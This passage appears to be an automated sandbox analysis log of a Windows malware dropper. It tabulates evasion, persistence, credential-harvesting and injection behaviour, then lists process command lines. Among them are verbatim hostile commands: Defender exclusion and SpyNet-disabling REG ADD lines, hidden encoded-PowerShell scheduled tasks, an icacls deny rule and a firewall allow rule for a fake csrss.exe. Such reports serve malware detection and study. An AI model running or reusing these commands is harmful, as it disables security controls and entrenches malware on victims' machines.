| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk | C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Software\Wine | C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe | N/A |
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 193.233.132.49 | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\6822f988-ccf5-4e57-afb4-dd971c700c06\\xVovRr115da5UGt7mKVb47Cj.exe\" --AutoStart" | C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" | C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\manifest.json | C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\GroupPolicy\gpt.ini | C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2816 set thread context of 844 | N/A | C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe | C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe |
| PID 5096 set thread context of 3608 | N/A | C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 3404 set thread context of 412 | N/A | C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe | C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe |
| PID 6076 set thread context of 5088 | N/A | C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe
"C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe"
C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe
"C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe"
C:\Users\Admin\Documents\GuardFox\aOiKcNVG4FAxtldCM7_Aj8fa.exe
"C:\Users\Admin\Documents\GuardFox\aOiKcNVG4FAxtldCM7_Aj8fa.exe"
C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe
"C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe"
C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe
"C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe"
C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe
"C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe"
C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe
"C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe"
C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe
"C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2868 -ip 2868
C:\Users\Admin\AppData\Local\Temp\7zS11A5.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp
"C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp" /SL5="$501CC,4124890,54272,C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe"
C:\Users\Admin\Documents\GuardFox\T83K0fj1RPNZcK5ce9BGYbEr.exe
"C:\Users\Admin\Documents\GuardFox\T83K0fj1RPNZcK5ce9BGYbEr.exe"
C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe
"C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe"
C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe
"C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2972_133531841536410118\WW9_64.exe
"C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe"
C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe
"C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe" -i
C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
"C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe"
C:\Users\Admin\Documents\GuardFox\ozHYoRTpmXEy7Cy7N9wHNH1A.exe
"C:\Users\Admin\Documents\GuardFox\ozHYoRTpmXEy7Cy7N9wHNH1A.exe"
C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe
"C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe"
C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe
"C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 344
C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
"C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe"
C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe
"C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe"
C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe
"C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe"
C:\Users\Admin\Documents\GuardFox\Ipjb8_Ct3Bu5_uNThO5sOupY.exe
"C:\Users\Admin\Documents\GuardFox\Ipjb8_Ct3Bu5_uNThO5sOupY.exe"
C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe
.\Install.exe /MFFdidt "525403" /S
C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe
"C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe" -s
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\6822f988-ccf5-4e57-afb4-dd971c700c06" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
"C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
"C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 412 -ip 412
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 412 -s 568
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffa9bc9758,0x7fffa9bc9768,0x7fffa9bc9778
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5820 -ip 5820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5820 -s 2072
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2272 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:8
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3064 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3044 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:1
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "glrLJrRva" /SC once /ST 08:51:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4904 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "glrLJrRva"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4748 -ip 4748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4748 -s 2164
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe
"C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe"
C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe
"C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
